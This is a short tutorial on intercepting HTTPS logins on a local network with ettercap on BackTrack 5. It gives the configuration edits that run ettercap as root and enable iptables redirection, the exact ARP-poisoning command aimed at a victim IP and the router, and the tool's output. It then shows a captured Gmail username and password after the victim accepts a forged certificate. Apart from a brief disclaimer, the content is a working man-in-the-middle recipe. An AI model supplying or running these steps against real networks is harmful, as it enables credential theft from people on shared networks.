HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational only. Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***



Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.



Step 1 :



nano /etc/etter.conf



Make the change as the following :



[privs]

ec_uid = 0    # nobody is the default

ec_gid = 0    # nobody is the default




Uncomment the following :



# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"




Step 2 :



Victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. Attacker is at 192.168.1.115.



ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/



The outcome of the display is as the following :



ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA



Dissector "dns" not supported (etter.conf line 72)

Listening on eth0... (Ethernet)



eth0 ->    08:00:27:FF:95:DB    192.168.1.115 255.255.255.0



Privileges dropped to UID 0 GID 0...



  28 plugins

  39 protocol dissectors

  53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services



Scanning for merged targets (2 hosts)...



* |=================================================>| 100.00 %



2 hosts added to the hosts list...



ARP poisoning victims:



GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A



GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2

Starting Unified sniffing...





Text only Interface activated...

Hit 'h' for inline help




Step 3 :



At the victim's machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail.



When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine. The display will be similar to the following :



HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s



You will find that USER: samiux and PASS: password.



Remarks :



To delete the untrusted certificate on Firefox at victim's machine : "Edit" -- "Perference" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.



Thawte Consulting (Pty) Ltd.

www.google.com www.google.com:443 forever 2011-09-21

www.google.com mail.google.com:443 forever 2011-09-21




In general, GMail will not ask you to accept any certificate, especially untrusted one.



That's all! See you.